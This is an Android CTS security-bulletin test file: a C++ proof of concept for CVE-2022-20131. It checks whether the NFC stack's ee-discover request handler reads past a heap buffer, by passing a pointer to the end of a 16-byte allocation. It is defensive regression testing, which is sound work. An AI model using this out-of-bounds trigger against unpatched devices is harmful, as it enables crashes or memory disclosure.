xref: /aosp_15_r20/cts/hostsidetests/securitybulletin/securityPatch/CVE-2022-20131/poc.cpp (revision b7c941bb3fa97aba169d73cee0bed2de8ac964bf) 
1 /*
2  * Copyright (C) 2022 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include "../includes/common.h"
18 #include "../includes/memutils.h"
19 
20 #include <nfc_int.h>
21 #include <rw_int.h>
22 
23 constexpr size_t kBufferSize = 16;
24 char enable_selective_overload = ENABLE_NONE;
25 bool isTestInProgress = false;
26 
27 struct sigaction new_action, old_action;
28 
sigsegv_handler(int signum,siginfo_t * info,void * context)29 void sigsegv_handler(int signum, siginfo_t *info, void *context) {
30     if (isTestInProgress && info->si_signo == SIGSEGV) {
31         (*old_action.sa_sigaction)(signum, info, context);
32         return;
33     }
34     exit(EXIT_FAILURE);
35 }
36 
poc_cback(tRW_EVENT,tRW_DATA *)37 void poc_cback(tRW_EVENT, tRW_DATA*) {
38 }
39 
main()40 int main() {
41     sigemptyset(&new_action.sa_mask);
42     new_action.sa_flags = SA_SIGINFO;
43     new_action.sa_sigaction = sigsegv_handler;
44     sigaction(SIGSEGV, &new_action, &old_action);
45 
46     tNFC_ACTIVATE_DEVT p_activate_params = { };
47     p_activate_params.protocol = NFC_PROTOCOL_ISO_DEP;
48     p_activate_params.rf_tech_param.mode = NFC_DISCOVERY_TYPE_POLL_A;
49     RW_SetActivatedTagType(&p_activate_params, &poc_cback);
50     FAIL_CHECK(rw_cb.p_cback == &poc_cback);
51 
52     GKI_init();
53     rw_init();
54     uint16_t bufLen = 0;
55     enable_selective_overload = ENABLE_ALL;
56     uint8_t* buffer = (uint8_t*)malloc(sizeof(uint8_t) * kBufferSize);
57     FAIL_CHECK(buffer);
58     uint8_t* buffer_ptr = buffer;
59     buffer = buffer + kBufferSize;
60 
61     isTestInProgress = true;
62     nfc_ncif_proc_ee_discover_req(buffer, bufLen);
63     enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
64     isTestInProgress = false;
65 
66     free(buffer_ptr);
67     return EXIT_SUCCESS;
68 }
69